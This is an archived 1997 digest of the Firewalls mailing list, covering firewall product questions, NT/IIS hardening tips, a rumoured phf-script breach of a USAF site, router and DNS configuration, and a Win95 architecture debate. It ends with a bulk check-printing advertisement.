______________________________ Reply Separator _________________________________ Subject: Re: FW-1 throughput? Etc. Author: David Wee|INTERNET|David.Wee@singapore.sun.com at MCIMAIL Date: 1/8/97 12:33 AM > From David.Wee@Singapore Sun Jan 5 23:55:38 1997 > Date: Mon, 6 Jan 1997 15:53:50 +0800 > From: David.Wee@Singapore (David Wee) > To: julie.gupta@Corp > Subject: FW-1 throughput? Etc. > Cc: David.Wee@Singapore > > Julie, > > > Can you please help answer 1 & 2 > > > Regards,david > ----- Begin Included Message ----- > > From drexx@sunphil.mozcom.com Mon Jan 6 15:45:31 1997 > Date: Mon, 6 Jan 1997 15:46:44 -0800 > From: drexx@sunphil.mozcom.com (Dexter D. Laggui) > To: firewalls@greatcircle.com, dwee@Singapore > Subject: FW-1 throughput? Etc. > > Hello world, > > I would be very much obliged if anybody can please answer on this: > > 1] How many packets per second can the Solstice Firewall-1 2.1 > (installed in a Sun Sparcstation 20 with Solaris 2.5) > process ? In mbps terms? > 2] Current needs dictate for a solution involving FWs with multiple > secure VPNs to mobile customers. I like the capabilties of > FW-1 2.1 very much but I understand that it does not support VPN > today. Do I need the SunScreen to complement it? :-( > 3] Who do I talk to in Sun Singapore for FW and SunScreen training? > What is the mailing list for Checkpoint/Solstice Firewall-1 users? > > Thank you very much for your kindness. :-) > > Yours, > Dexter D. Laggui > Systems Engineer > > drexx@sunphil.mozcom.com > Philippine Systems Products Inc. > > > ----- End Included Message ----- > > From firewalls-owner Wed Jan 8 10:19:15 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA04124 for firewalls-outgoing; Wed, 8 Jan 1997 09:38:46 -0800 (PST) Received: from magneto.acquion.com (magneto.acquion.com [206.154.17.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id JAA04117 for ; Wed, 8 Jan 1997 09:38:37 -0800 (PST) Received: from wolverine (wolverine.acquion.com [206.154.17.12]) by magneto.acquion.com (post.office MTA v2.0 0813 ID# 0-11944) with SMTP id AAA299 for ; Wed, 8 Jan 1997 12:43:07 -0500 Message-Id: <2.2.32.19970108174025.00902258@mail.acqic.org> X-Sender: oolid@mail.acqic.org X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 08 Jan 1997 12:40:25 -0500 To: firewalls@greatcircle.com From: oolid@acqic.org (Joseph L. Moll) Subject: Microsoft Rome? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can anyone comment on what the "ms-rome 569/udp #microsoft rome" service is for? Regards, Joe, oolid@acqic.org From firewalls-owner Wed Jan 8 10:23:07 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA02040 for firewalls-outgoing; Wed, 8 Jan 1997 08:59:18 -0800 (PST) Received: from www.steldyn.com (www.steldyn.com [198.68.45.121]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA02014 for ; Wed, 8 Jan 1997 08:59:01 -0800 (PST) Received: from juneau.steldyn.com (172.16.31.1) by www.steldyn.com (EMWAC SMTPRS 0.81) with SMTP id ; Wed, 08 Jan 1997 10:05:48 -0700 Received: by juneau.steldyn.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFD4A.A17D20C0@juneau.steldyn.com>; Wed, 8 Jan 1997 09:59:26 -0700 Message-ID: From: Chris Pugrud To: "'Franke Albert 2 Lt USAFE CSS/SCBS'" , Firewalls Mailing list Subject: RE: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! Date: Wed, 8 Jan 1997 09:59:25 -0700 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This really as not as bad of a situation as it seems. Here are a few pointers to vastly increasing the security of the system. This is not the be all or end all of security. I am sure that there are more steps that you can take to increase your security even more. Buyer Beware. Your mileage may vary... Apply sp2 for Windows NT 4.0 SP2 fixes several bugs in the OS and IIS http://www.microsoft.com/ntserversupport/Default-SL.HTM The machine really should be used only for serving web pages. If you can dedicate a singular machine, even a 486, to just tossing HTTP then you can greatly increase the security. Under Control Panel > Services, Only the following MUST be running for a web server: EventLog FTP Publishing Service (optional) Plug and Play (NT 4.0) Workstation World Wide Web Publishing Service Only these services should be set "Automatic". All other services should be set "manual." Be careful, your mileage may vary... Use IIS security IIS has some built in allow/deny filtering based on IP address Internet Service Manager > WWW Service Properties > Advanced TAB CGI/BIN is BAD (by default) Remove scripts and the HTML Administrator if installed Internet Service Manager > Directories Ideally only "C:\InetPub\wwwroot" "" is listed. Remove all others, especially any that you can not identify. While you are there make sure to go to "logging" and set up logs Also go c:\InetPub and set security NT Explorer > C:\InetPub > right click > properties > security > permissions Replace Permissions on Subdirectories Replace Permissions on Existing Files Make Everyone Read (RX)(RX) Make Administrator Full Control (All)(All) Remove all others This sets things up so that only the administrator can make changes and they must be made from the machine. Use the OS security NT 4.0 has basic packet filtering built in Control Panel > Network > Protocols > TCP/IP > Properties > IP Address > Advanced > Enable Security > Configure Permit Only (TCP Ports) > Add > 80 (http) Permit Only (UDP Ports) > (leave blank) Permit Only (IP Protocols) > Add > 6 (TCP) This really cuts down what the machine can do. If you need to surf from the machine you may need to add 53 to UDP Ports. While you in the control panel, also check your bindings: Control Panel > Network > Bindings > Show Bindings for "all protocols." Make sure that "TCP/IP" is Enabled Disable all others Show bindings for "all adapters" Expand the adapter (click the plus box) Expand WINS Client You may need to Enable Workstation If the networking will not start on reboot If you do, make sure to disable server and NetBIOS Interface Restart your computer Good day and Good luck Chris >-----Original Message----- >From: Franke Albert 2 Lt USAFE CSS/SCBS [SMTP:albert.franke@ramstein.af.mil] >Sent: Wednesday, January 08, 1997 3:52 AM >To: Firewalls Mailing list >Subject: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! > >I am responsible for securing (as well as I can) a DEC Alpha running >Windows NT 4.0 and Internet Information Server as our WWW Server. It is >sitting as a node on our LAN and everyone in the world can access it. I >want a program that I can run on it that will allow/disallow blocks of >IP addresses such as 132.244 or .AF.MIL only. Also, I would like (but >not as necessary) it to keep detailed logs. I have heard of O'Reiley's >WebSite, but I don't know if this will do. I do not have funding for an >expensive firewall machine, and it is impracticle to add routers into >our LAN. Please help if you have any suggestions. Thanks. > >albert.franke@ramstein.af.mil >Albert E. Franke, 2Lt, USAF >OIC, USAFE Web Tech Support 480-7905 From firewalls-owner Wed Jan 8 10:42:40 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA04490 for firewalls-outgoing; Wed, 8 Jan 1997 09:46:23 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id JAA04461 for ; Wed, 8 Jan 1997 09:46:07 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id MAA18010; Wed, 8 Jan 1997 12:42:50 -0500 From: Adam Shostack Message-Id: <199701081742.MAA18010@homeport.org> Subject: Re: USAF: how it was hacked In-Reply-To: <199701080554.AAA17354@news2.mnsinc.com> from matrix at "Jan 8, 97 00:51:01 am" To: smanning@mail1.mnsinc.com (matrix) Date: Wed, 8 Jan 1997 12:42:50 -0500 (EST) Cc: Firewalls@GreatCircle.COM X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sure we can keep the rumors to a dull roar. Make an official statement about how it was done. Adam | Matthew Patton wrote... | > | > Really quite anticlimatic. The infamous phf script was left active on | > the server and was how they got in. Root, the whole 9 yards. | | Really? What are these statements based on? | | Could we please keep the rumors to a dull roar? Thanks! | | Stephen Manning, Special Agent | Computer Crime Investigator | Air Force Office of Special Investigations | Voice: (301) 981-5469 - Fax: (301) 981-3087 | -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Wed Jan 8 11:35:56 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA09207 for firewalls-outgoing; Wed, 8 Jan 1997 11:02:24 -0800 (PST) Received: from proton.llumc.edu (proton.llumc.edu [143.197.200.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA09191 for ; Wed, 8 Jan 1997 11:02:09 -0800 (PST) Received: from mycroft.llumc.edu (mycroft.llumc.edu [143.197.200.18]) by proton.llumc.edu (8.7.6/8.6.9) with SMTP id KAA29068; Wed, 8 Jan 1997 10:58:41 -0800 (PST) Date: Wed, 8 Jan 1997 10:56:30 -0800 (PST) From: Michael Baumann To: Ken Barlow cc: "'firewalls@GreatCircle.COM'" , "Starkweather; Mike" Subject: Re: Pointcast In-Reply-To: <2D3B3AC0.@acccorp.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 8 Jan 1997, Ken Barlow wrote: > I find it's one of those subjects that costs alot and > produces _no_ benefit for the company. > And there is the rub. It produces *no* benefit to the company. It (ab)uses bandwidth. I had no problem at all with management when I suggested we configure our proxy to deny access to the pointcast network. Just say no. > > ______________________________ Reply Separator _________________________________ > Subject: Pointcast > Author: "Starkweather; Mike" at Internet > Date: 1/7/97 1:29 PM > > > I am wondering how the members of this mail list have handled the > flood of traffic generated by Pointcast. It has buried our firewall > (Tis Toolkit) with the huge number of requests it generates. Their > I-Server seems to help some but not as much as I had hoped. > > If this is the wrong place for this question please redirect me. > > Mike Starkweather > Anheuser-Busch > -- Michael Baumann Optivus Technology Inc.|Loma Linda University Medical Center San Bernardino, California. (909)799-8308 |Internet: baumann@llumc.edu From firewalls-owner Wed Jan 8 11:40:13 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA08736 for firewalls-outgoing; Wed, 8 Jan 1997 10:54:41 -0800 (PST) Received: from atzhcd3.gordon.army.mil (atzhcd3.gordon.army.mil [147.51.83.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id KAA08672 for ; Wed, 8 Jan 1997 10:54:00 -0800 (PST) Received: by atzhcd3.gordon.army.mil with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFD6B.32083FB0@atzhcd3.gordon.army.mil>; Wed, 8 Jan 1997 13:52:32 -0500 Message-ID: From: Thomas Duke To: "'Firewalls@GreatCircle.COM'" Subject: RE: USAF: how it was hacked Date: Wed, 8 Jan 1997 13:52:31 -0500 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The military like any other organization has to realized they must pay for the skill sets necessary to perform these tasks. The majority a people that do these things are not skilled....and won't be until the military/gov figures out how to reward/pay IS professionals creatively like the military doctors/dentists. Why would I want to stay in the gov/mil business getting 1/2 my value? >---------- >From: A. Omer Koker[SMTP:omer@superonline.net] >Sent: Wednesday, January 08, 1997 7:50 AM >To: 'Firewalls@GreatCircle.COM'; 'Matthew Patton' >Subject: RE: USAF: how it was hacked > >Interestingly enough this specific hole was described in detail on the >latest 2600mag. >now you know they will start reading it... > >>---------- >>From: Matthew Patton[SMTP:patton@sysnet.net] >>Sent: 08 Ocak 1997 Cartamba 01:09 >>To: Firewalls@GreatCircle.COM >>Subject: USAF: how it was hacked >> >>No, this isn't about cdrom based web content. >> >>Really quite anticlimatic. The infamous phf script was left active on >>the server and was how they got in. Root, the whole 9 yards. >> >>What's really funny is that no more than a week prior to the incident, I >>suggested to ASSIST (the military's equiv of CERT, and now financial >>sponsor of same) that in light of the minor poking around I did on a >>handful of military web sites, that they needed to get the word out to >>admins because so many servers were in a high state of misconfiguration >>and just waiting to be exploited. 7 days later, boom!! >> >>I'm not sure on what grounds people place so much trust in the military >>to do things right with respect to host and network security. I'm sure >>there are segments that do a damn fine job, but seeing the abject lack of >>skills and knowledge in the Pentagon area makes me a mite bit skeptical >>and not a little ashamed. It's a wonder we don't see high profile >>exploits on a routine basis. Don't get me wrong, the private sector >>doesn't have their act together on many fronts as well. >> >>Now hopefully the thread can die in peace. >> > From firewalls-owner Wed Jan 8 12:55:23 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA14270 for firewalls-outgoing; Wed, 8 Jan 1997 12:19:47 -0800 (PST) Received: from manukau.govt.nz ([202.14.82.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA14178 for ; Wed, 8 Jan 1997 12:19:14 -0800 (PST) Received: by kotuku.manukau.govt.nz id <35722>; Thu, 9 Jan 1997 09:30:34 +1300 Message-Id: <97Jan9.093034nzdt.35722@kotuku.manukau.govt.nz> From: Matthew Thompson To: "'Firewalls (inet/GreatCircle)'" , "'Sebastian Stache'" Cc: "'Wilner@DOCKMASTER.NCSC.MIL'" , "'proberts@clark.net'" Subject: RE: Re: NCSA != NCSC Date: Fri, 10 Jan 1997 11:13:28 +1300 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sebastian Stache[SMTP:zeb@sbbs.se] Wrote: >Wilner informed me that: >> Everything except boot-up depends upon the O/S. Nothing is below the "O/S >> layer," nor does one speak of such a layer unless one intends "application >as well as >> layer" and doesn't know an application from an O/S, nor can a single byte be >> sent or retrieved over a device (networked or otherwise) unless an O/S is >> relied upon, nor can a single access to memory, disk, or what-have-you be ... >Now suppose I wanted to use Drivespace, an MS technique to >compress harddisks on the fly. Or even better, Stacker, a 3rd- >party equivalent. Either of these would install themselves >BELOW Windows 95 (and even more interestingly, in some respects >even below DOS) but ABOVE the ROM-based BIOS (binary I/O OS). >To Windows 95 (and to DOS), the compression activities would >be transparent, ie Windows would not *know* about them. Which >of course is the whole point. Bzzzst. Wrong. When Win95 runs the "Real Mode DOS" it runs it in an x86 virtual machine. Here I'm talking about the DOS it uses to boostrap the machine, load all "real mode" device drivers etc, not user started DOS sessions (which also run in separate x86 virtual machines). It heavily breakpoints this DOS code, and in fact will recieve control back from DOS (without the DOS code's knowledge) at points it has determined it needs to, it will also catch many int calls to the BIOS and handle them in protected mode without "Real Mode DOS's" knowledge. The BIOS and DOS isn't used for a hell of a lot any more (at least once '95 boots), not for Disk (unless no protected mode disk driver exists for the device), Screen, Keyboard, or Serial port I/O, and that's most of the BIOS. All these functions are handled by 32 bit protected mode device drivers which go straight to the hardware, and in almost all cases around DOS and the BIOS. There are exceptions to this, where Win95 has no protected mode driver for the device, it will use DOS and loaded device drivers effectively as the "device driver" to access the device. And calls to this "device driver" can end up back in the Win95 OS. Use of real mode DOS drivers is a choice, for backward compatibility, a choice you don't for example have with NT. However anyone who wants to set up Win95 for speed and stability will avoid real mode drivers like the plauge. With Win95, running the GUI is a choice, much like firing up X11 on top of Unix is, you can still have premptively multitasked character mode sessions if you want to. >I don't think there's any point in mentioning utilities that >halt the computer when a virus is detected, or when battery >status is low, or when the Debug-mode button is pressed, or >when a source-routed packet arrives. Well, under '95 these should (and are by all leading players) be implemented as 32 bit virtual device drivers. and a source routed packet is not going to get far on any OS without going thru the TCP/IP stack, which admittedly could be a real mode stack on 95, but that's not the sensible choice. Win311 is an operating system, it offers preemptive multitasking, virtual memory, and controls file system and most I/O devices. It has more in common with Win95 architecturally than one (particularly if that one is in Bill Gates' marketing dept.) may wish to think. The common misconception, that windows 3.11 only offers cooperative multitasking stems from the fact that all Win16 apps are cooperatively multitasked within the same virtual machine and same address space, and all most users see is the cooperatively multitasking face fo Win3.11, underneath, it's 32 bit, premptive multitasking for virtual machines. This decision (UGH!) transfers forward to Win95 as well, which is why those wanting good stable Win95 performance avoid 16 bit apps like the plauge as well. WinNT of course can run each 16 bit app in it's own virtual machine (or a shared one if you choose). Win95 is full of hacks and kludges, but for good reason, BACKWARD COMPATIBILITY. Users would have squawked long and loud about how "bad" or "incompatible" etc that Win95 was if all their 16 bit apps stopped running, and they could no longer use their WeeLee4000 CD-ROM drive, or EastClone9000 SCSI adapter just because no-one had written a protected mode driver for it yet. You want a Microsoft OS without so many backward compatability compromises?, Get off 95 and onto NT. Cheers, Matthew. --------------------------------------------------------------------- Kiwitech Marine Solutions Ltd. RaceTech, SailTech, PowerTech, Marine Software & Hardware Web: http://www.kiwitech.co.nz, Email: mthomps1@kiwitech.co.nz Phone: +64-9-307-0819 Fax: +64-9-307-6685 Mobile: +64-21-998-600 PO Box 5909, Wellesley Street, Auckland, New Zealand From firewalls-owner Wed Jan 8 14:19:16 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA21467 for firewalls-outgoing; Wed, 8 Jan 1997 13:41:23 -0800 (PST) Received: from lexicon.ins.com (lexicon.ins.com [199.0.193.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id NAA21455 for ; Wed, 8 Jan 1997 13:41:11 -0800 (PST) Received: from kcann.taylormade.com (kcann.taylormade.com [205.226.160.70]) by lexicon.ins.com (8.7.5/8.7.3) with SMTP id NAA17764; Wed, 8 Jan 1997 13:40:36 -0800 (PST) Message-ID: <32D412C5.42A2@ins.com> Date: Wed, 08 Jan 1997 13:33:57 -0800 From: Kevin Cann Reply-To: kevin_cann@INS.COM Organization: ins.com. X-Mailer: Mozilla 3.0 (Win95; I) MIME-Version: 1.0 To: uscny8hb@ibmmail.com CC: Firewalls@GreatCircle.COM Subject: Re: internal filtering router - filter config? References: <199701080648.WAA21235@miles.greatcircle.com> <32D3A3BF.5D36@dreamscape.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Simply use the 'no ip source route' global router command. Steven E. Matkoski wrote: > > Firewalls-Digest wrote: > > > > In your external router you'd block any ICMP traffic going back and > > forth, as well as any packets bearing one of your internal IP addresses, > > as a source address, especially if these are going INTO your protected > > network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill > > any ports that your users will not be using, andl leave just mail, web, > > ftp, etc. > > > > ricardo > > ralvarado@avantel.com.mx > > > Thanks, I also read that you could block source-routed packets there, > also. > If I am using a cisco router, how does on go about this? or can I get a > location for documentation. > > Thanks! > -steve. > matkoski@dreamscape.com -- _____________________________________________________________ Kevin K. Cann International Network Services Network Systems Consultant 111 Deerwood Road #200 Pager: 1-888-587-3119 San Ramon, CA 94583 (510) 831-4743 "PROVIDING THE POWER OF OPERABLE NETWORKS" _____________________________________________________________ From firewalls-owner Wed Jan 8 15:30:33 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA27086 for firewalls-outgoing; Wed, 8 Jan 1997 15:15:17 -0800 (PST) Received: from gamma.wantech.se (gamma.wantech.se [193.44.131.30]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id PAA27050 for ; Wed, 8 Jan 1997 15:15:02 -0800 (PST) Received: (qmail 2682 invoked by uid 503); 8 Jan 1997 23:14:37 -0000 Date: Thu, 9 Jan 1997 00:14:36 +0100 (MET) From: Patrik Backstrom X-Sender: pb@gamma.wantech.se To: firewalls@greatcircle.com Subject: Guardian 2.0 NAT on NT 4.0 troubles Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=iso-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi everyone! I havn't found a FAQ on the Guardian anywhere... is there one? Anyway - I have installed Guardian Firewall 2.0 on a NT 4.0 machine, works fine. But when i install the Guardian NAT on top of it, it suddenly refuses to let *any* traffic through the firewall. It doesn't matter what rules i add to either the Firewall or the NAT, it still refuses any traffic. It's running on a Windows NT 4.0 Pentium machine, Service pack 1 & 2 installed, equiped with two 3COM 3C900 PCI 10MBit Ethernet cards. Am i missing something, that is obvious to everyone else? :-) Hope somebody can help me with this... /pb --------------------------------------------------------- Patrik B=E4ckstr=F6m Phone.....: +46-(0)707-881928 Timgatan 3 Homepage..: http://www.klingon.pp.se 415 08 G=F6teborg E-Mail....: pb@techno.org Finger pb@techno.org for my PGP Public Key --------------------------------------------------------- From firewalls-owner Wed Jan 8 17:59:37 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA08403 for firewalls-outgoing; Wed, 8 Jan 1997 17:42:36 -0800 (PST) Received: from ns.sbbs.se (ns.sbbs.se [194.16.248.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id RAA08381 for ; Wed, 8 Jan 1997 17:42:12 -0800 (PST) Received: from ns.sbbs.se by ns.sbbs.se (NTMail 3.02.09) with ESMTP id ra138311 for ; Thu, 9 Jan 1997 02:41:46 +0100 Received: by ppp49.sbbs.se with Microsoft Mail id <01BBFDD6.54867FF0@ppp49.sbbs.se>; Thu, 9 Jan 1997 02:39:26 +0100 Message-ID: <01BBFDD6.54867FF0@ppp49.sbbs.se> From: Sebastian Stache To: "'Matthew Thompson'" Cc: "'Firewalls (inet/GreatCircle)'" Subject: RE: Re: NCSA != NCSC Date: Thu, 9 Jan 1997 02:39:18 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Matthew Thompson wrote: >With Win95, running the GUI is a choice, much like firing up X11 on top of >Unix is, you can still have premptively multitasked character mode sessions >if you want to. If you refer to Explorer.exe as the GUI, I agree, it's much like X-Window. Windows 95 is however NOT much like X-Window, since it provides almost every kind of functionality you'd expect from an operating system. X-Window is little more than a shell. Win95 provides disk cache, long filenames, pipes, mailslots, RPC, network services and much more. To demonstrate this point, go to your nearest Win95 box and edit SYSTEM.INI. Replace this line Shell=Explorer.exe with Shell=Command.com Now when you start Windows, you'll have the equivalent (hrm, well) of a Borne shell, with multi-tasking and all. Care to try X-Window? Type "explorer". (I don't really think it matches neither Borne nor X-Window ). From firewalls-owner Wed Jan 8 17:59:46 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA08402 for firewalls-outgoing; Wed, 8 Jan 1997 17:42:32 -0800 (PST) Received: from ns.sbbs.se (ns.sbbs.se [194.16.248.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id RAA08376 for ; Wed, 8 Jan 1997 17:42:02 -0800 (PST) Received: from ns.sbbs.se by ns.sbbs.se (NTMail 3.02.09) with ESMTP id na138307 for ; Thu, 9 Jan 1997 02:41:43 +0100 Received: by ppp49.sbbs.se with Microsoft Mail id <01BBFDD6.5258CA80@ppp49.sbbs.se>; Thu, 9 Jan 1997 02:39:22 +0100 Message-ID: <01BBFDD6.5258CA80@ppp49.sbbs.se> From: Sebastian Stache To: "'Matthew Thompson'" Cc: "'Firewalls (inet/GreatCircle)'" , "'Wilner@DOCKMASTER.NCSC.MIL'" , "'proberts@clark.net'" Subject: RE: Re: NCSA != NCSC Date: Thu, 9 Jan 1997 02:21:51 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Matthew Thompson wrote: >>Sebastian Stache[SMTP:zeb@sbbs.se] Wrote: >>Now suppose I wanted to use Drivespace, an MS technique to >>compress harddisks on the fly. Or even better, Stacker, a 3rd- >>party equivalent. Either of these would install themselves >>BELOW Windows 95 (and even more interestingly, in some respects >>even below DOS) but ABOVE the ROM-based BIOS (binary I/O OS). >>To Windows 95 (and to DOS), the compression activities would >>be transparent, ie Windows would not *know* about them. Which >>of course is the whole point. >Bzzzst. Wrong. >When Win95 runs the "Real Mode DOS" it runs it in an x86 virtual machine. >Here I'm talking about the DOS it uses to boostrap the machine, load all >"real mode" device drivers etc, not user started DOS sessions (which also >run in separate x86 virtual machines). It heavily breakpoints this DOS >code, and in fact will recieve control back from DOS (without the DOS >code's knowledge) at points it has determined it needs to, it will also >catch many int calls to the BIOS and handle them in protected mode without >"Real Mode DOS's" knowledge. A few facts, if I may. Real mode can never be "run in an x86 virtual machine". If the expression had been symentically correct, it would be have been contradictive . When "Real Mode DOS" is running, the processor is in real mode. When a DOS-box is run under Win95, the processor is in protected mode, with the VM (Virtual Mode) flag set. HIMEM.SYS can be used to switch to protected mode in a controlled and cooperative manner. HIMEM.SYS is automatically loaded by the Win95 version of IO.SYS unless explicitly told not to. Neither Drivespace nor Stacker are device drivers. The device driver for IDE devices resides in BIOS in modern (post -88) PCs. Both Drivespace and Stacker use a DOS extension technique to create new "virtual" devices with their own drive letters. The technique is exactly the same as MSCDEX and SUBST use. It is also exactly the same technique that is used by NET USE and Netware MAP. In all of the above cases, we are creating file components which are treated as black boxes by Windows, the operating system. If I wanted to write my own version of NET.EXE, I would probably see to that whenever a file containing the text "source routed packet" was requested to be stored on the remote host, I would triple-DES it. And Windows would not ever SEE this, since this functionality existed BELOW the operating system (Windows). >Bzzzst. Wrong. Wrong? Which word? From firewalls-owner Wed Jan 8 18:30:25 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA08765 for firewalls-outgoing; Wed, 8 Jan 1997 17:50:21 -0800 (PST) Received: from wanggate (wanggate.wang.co.nz [192.58.229.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id RAA08752 for ; Wed, 8 Jan 1997 17:50:09 -0800 (PST) Received: by wanggate (951211.SGI.8.6.12.PATCH1042/951211.SGI) for id OAA23893; Thu, 9 Jan 1997 14:49:28 +1300 Received: from wnx1(172.17.28.6) by wanggate via smap (3.1) id xma023877; Thu, 9 Jan 97 14:49:04 +1300 Received: by WNX1 with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.57) id <01BBFE3C.55BA34A0@WNX1>; Thu, 9 Jan 1997 14:49:37 +1300 Message-ID: From: Mahesh Ravji To: "'Firewalls@GreatCircle.COM'" Subject: DNS forwarding to firewall Date: Thu, 9 Jan 1997 14:49:35 +1300 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.57 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, I'm having problems getting Sun's in.named to forward requests to our firewall. We have a Bordaware firewall and multiple secondary DNS located at various sites. All secondary DNS's are running Solaris 2.5 and need to be configured to forward queries it can't resolve to the firewall. I have added the 'forwarders' directive to the named.boot file which looks something like this: ; named boot file for secondary server ; directory /var/named ; type domain source host/file backup file cache . named.ca forwarders a.b.16.8 slave primary . db.. secondary some.domain a.b.64.227 db.some.domain secondary b.a.IN-ADDR.ARPA a.b.64.227 db.a.b primary 0.0.127.IN-ADDR.ARPA db.127.0.0 The DNS resolves all internal requests but does not appear to forward names that it can't resolve to the firewall. Has anyone else configured a similar setup in a Solaris environment? TIA Mahesh Ravji Phone: +64 4 382-0100 Wang NZ Ltd. Fax: +64 4 385-6067 195-201 Willis Street E-Mail: Mahesh.Ravji@wang.co.nz PO Box 6648 Wellington New Zealand From firewalls-owner Wed Jan 8 18:45:04 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA10212 for firewalls-outgoing; Wed, 8 Jan 1997 18:15:34 -0800 (PST) Received: from mtigwc02.worldnet.att.net (mailhost.worldnet.att.net [204.127.129.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id SAA10195; Wed, 8 Jan 1997 18:15:04 -0800 (PST) Received: from Default ([153.35.0.194]) by mtigwc02.worldnet.att.net (post.office MTA v2.0 0613 ) with SMTP id AAD20151; Thu, 9 Jan 1997 00:33:40 +0000 From: printerm@softcell.net Date: Wed, 08 Jan 1997 19:36:59 PST Subject: CheckRite Laser Checks! (B) Message-ID: <19970109003156.AAD20151@Default> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The (B) means"bulk class mail", we put that there so you will be able to tell that you have a bulk mail without having to open it. We also put that there so you can filter us out if you wish. Please put REMOVE in the subject and press reply if you do not wish to receive mail from us again. CheckRite 2000 by Printerm MICR LASER CHECK PRINTING The fast approach to convert from Pre-printed checks to laser check printing DOWNLOAD FREE DEMO SOFTWARE FROM OUR WEB SITE http://bisinc.com/printerm/ Conversion from costly pre-printed checks to lower cost laser technology may save you as much as 8 cents per check. Printerm offers you a software package which allows a smooth link-up between your Accounting Software and your Laser Printer. Laser printing eliminates costly outside check form printing bills and allows the use of blank paper stock. Laser check printing means you will not have to contend with stocking large quantities of pre-printed checks which can become obsolete because of address changes, company name and changes in financial institutions. Printerm offers a full digitizing service to convert forms, logos and authorized signatures to digital data. These digitized items may be used on your mainframe computers or if you are using a HP LaserJet 4Plus, 4Si, 5 or 5Si printers they may be stored on a font cartridge or a flash simm. The font cartridge for the HP 4 series is simple to plug into the printer when check printing is required. The flash simm has to be mounted onto the MIO board in the HP LJ 5 and 5Si printers. HP Flash Cartridges and simms are programmed by Printerm with your check data and can assist you with your conversion program. FlashProm or simm products are available in various sizes from 256K up to 2MB. These products are reprogrammable to allow updating of data and can store forms, logos and authorized signatures for several different companies. Flash technology data storage allows your printer to print at maximum speed since there is no spooling delay of large files from your computer to the printer. You are able to print checks for several different companies with laser printing without experiencing delays caused by changing check stock. The MICR font provided by printerm is to ABA-X9 standards to ensure acceptance of your checks by banking institutions. Security is easy with Printerm's approach to laser printing. Pre-printed blank checks which may be lost or stolen are no longer required. The HP FlashProm cartridge (used to store check forms, signatures and logos) and the MICR (Magnetic Ink) toner cartridge are easily removed and stored in a secure area preventing un-authorized use when check printing is not required. The CheckRite 2000 package available from Printerm provides that essential back-up between your 